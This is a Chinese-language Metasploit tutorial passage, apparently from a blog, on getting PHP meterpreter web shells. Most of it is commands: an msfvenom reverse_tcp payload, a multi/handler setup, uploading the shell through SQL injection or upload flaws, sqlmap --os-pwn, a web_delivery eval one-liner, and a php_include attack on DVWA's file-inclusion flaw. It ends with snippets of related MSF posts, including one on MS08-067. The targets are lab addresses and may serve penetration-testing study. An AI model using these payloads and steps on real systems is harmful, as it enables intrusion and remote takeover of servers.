webshellroot@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.80.163 lport=3333 -f raw -o a.php 生成a.php
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.80.163
msf exploit(handler) > set lport 3333
msf exploit(handler) > exploit
通過sql注入寫許可權、上傳漏洞等,將a.php上傳到目標主機的web目錄下;
通過瀏覽器訪問a.php。
msf會獲得目標主機meterpreter型別的shell。
sql注入
sqlmap的--os-pwn引數,可以獲得目標的meterpreter型別的shell。
exploit/multi/script/web_delivery模組,配合命令執行漏洞使用msf exploit(handler) > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.80.163
msf exploit(web_delivery) > set uripath /
msf exploit(web_delivery) > set srvport 80
msf exploit(web_delivery) > set target 1
在存在命令執行漏洞的**上,執行下面的命令,msf會獲得目標主機的shell。php -d allow_url_fopen=true -r "eval(file_get_contents(''));"
環境準備:
dvwa的low級別**預設存在本地檔案包含漏洞;但是不存在遠端檔案包含漏洞,我們需要自己設定。
從phpinfo中獲取到如下資訊。
本地配置檔案路徑
sudo /etc/init.d/apache2 restart
msf exploit(php_include) > set rhost 192.168.80.135
msf exploit(php_include) > set path /dvwa/vulnerabilities/fi
msf exploit(php_include) > set phpuri /?page=xxpathxx
msf exploit(php_include) > set headers "cookie: security=low; phpsessid=69fb8940243aa75ba98a8e6698139671"
msf exploit(php_include) > set payload php/meterpreter/reverse_tcp
msf exploit(php_include) > set lhost 192.168.80.163
exploit獲得shell
Msf 基本用法
msf 基本用法 msfconsole help nmap sn 192.168.208.0 24 主機發現 滲透攻擊過程 需要xp使用者登入系統後才可以利用成功。1.search ms08 067 2.use exploit windows smb ms08 067 netapi use expl...
MSF學習筆記
貴有恆何必三更眠五更起,最無益只怕一日曝十日寒 話不多說,上乾貨。滲透模組 exploit 執行時會利用目標主機漏洞進行攻擊。攻擊載荷模組 payload 在成功對目標完成一次滲透之後,這段程式開始在目標主機上執行,幫助我們獲取需要的訪問和行動許可權。輔助模組 auxiliary 包含一系列輔助支援...
MSF使用流程
1 天鏡 nessus 極光掃瞄器進行漏洞掃瞄,跟據漏掃結果去msf裡面進行查詢漏洞利用工具 2 開啟msf 通過search搜漏洞編號或漏洞名稱 3 搜到漏洞之後,用use 開啟msf漏洞利用工具 4 輸入info檢視工具相關說明 5 用show options 檢視工具使用方法 6 配置遠端主機...